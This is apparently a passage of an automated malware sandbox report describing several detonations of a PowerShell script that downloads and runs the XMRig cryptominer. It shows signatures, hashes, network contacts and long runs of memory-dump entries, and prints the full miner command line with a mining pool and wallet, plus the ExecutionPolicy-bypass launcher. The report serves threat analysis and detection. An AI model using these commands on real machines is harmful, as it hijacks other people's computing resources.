memory/4564-110-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-111-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-112-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-113-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-114-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-115-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-116-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-117-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-118-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-119-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-120-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-121-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-122-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-123-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-124-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-125-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-126-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-127-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-128-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-129-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-130-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-131-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-132-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-133-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-134-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-135-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-136-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-137-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-138-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-139-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-140-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-141-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-142-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-143-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-144-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-145-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-146-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-147-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-148-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-149-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-150-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-151-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-152-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-153-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-154-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-155-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-156-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:24
Platform
win11-20240419-en
Max time kernel
1791s
Max time network
1759s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3500 wrote to memory of 4052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3500 wrote to memory of 4052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3500-0-0x00007FFE6B1F3000-0x00007FFE6B1F5000-memory.dmp
memory/3500-1-0x00000277695D0000-0x00000277695F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_na2oneoe.kg5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3500-10-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/3500-11-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/3500-12-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/3500-14-0x0000027769AE0000-0x0000027769AF2000-memory.dmp
memory/3500-15-0x0000027769AC0000-0x0000027769ACA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4052-46-0x000001ECE6730000-0x000001ECE6750000-memory.dmp
memory/4052-47-0x000001ECE7F30000-0x000001ECE7F50000-memory.dmp
memory/4052-48-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/3500-50-0x00007FFE6B1F3000-0x00007FFE6B1F5000-memory.dmp
memory/4052-49-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-52-0x000001ECE7F50000-0x000001ECE7F70000-memory.dmp
memory/3500-51-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/4052-54-0x000001ECE7F70000-0x000001ECE7F90000-memory.dmp
memory/3500-53-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/3500-55-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/4052-56-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-57-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-58-0x000001ECE7F50000-0x000001ECE7F70000-memory.dmp
memory/4052-59-0x000001ECE7F70000-0x000001ECE7F90000-memory.dmp
memory/4052-60-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-61-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-62-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-63-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-64-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-65-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-66-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-67-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-68-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-69-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-70-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-71-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-72-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-73-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-74-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-75-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-76-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-77-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-78-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-79-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-80-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-81-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-82-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-83-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-84-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-85-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-86-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-87-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-88-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-89-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-90-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-91-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-92-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-93-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-94-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-95-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-96-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-97-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-98-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-99-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-100-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-101-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-102-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-103-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-104-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-105-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-106-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-107-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-108-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-109-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-110-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-111-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-112-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-113-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-114-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-115-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-116-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-117-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
memory/4052-118-0x00007FF77CE10000-0x00007FF77DA43000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:29
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1768s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4764 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4764 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/4764-2-0x00007FFFF2EF3000-0x00007FFFF2EF4000-memory.dmp
memory/4764-5-0x0000013257F00000-0x0000013257F22000-memory.dmp
memory/4764-6-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp
memory/4764-10-0x0000013258030000-0x00000132580A6000-memory.dmp
memory/4764-11-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_thasetx4.xvh.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4764-28-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp
memory/4764-52-0x0000013257E80000-0x0000013257E92000-memory.dmp
memory/4764-65-0x0000013257E60000-0x0000013257E6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2484-94-0x000001F288DD0000-0x000001F288DF0000-memory.dmp
memory/4764-97-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp
memory/4764-96-0x00007FFFF2EF3000-0x00007FFFF2EF4000-memory.dmp
memory/2484-95-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-98-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/4764-99-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp
memory/2484-100-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-101-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-102-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-103-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-104-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-105-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-106-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-107-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-108-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-109-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-110-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-111-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-112-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-113-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-114-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-115-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-116-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-117-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-118-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-119-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-120-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-121-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-122-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-123-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-124-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-125-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-126-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-127-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-128-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-129-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-130-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-131-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-132-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-133-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-134-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-135-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-136-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-137-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-138-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-139-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-140-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-141-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-142-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-143-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-144-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-145-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-146-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-147-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-148-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-149-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-150-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-151-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-152-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-153-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-154-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-155-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-156-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-157-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-158-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-159-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
memory/2484-160-0x00007FF71D490000-0x00007FF71E0C3000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:30
Platform
win11-20240419-en
Max time kernel
1799s
Max time network
1770s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
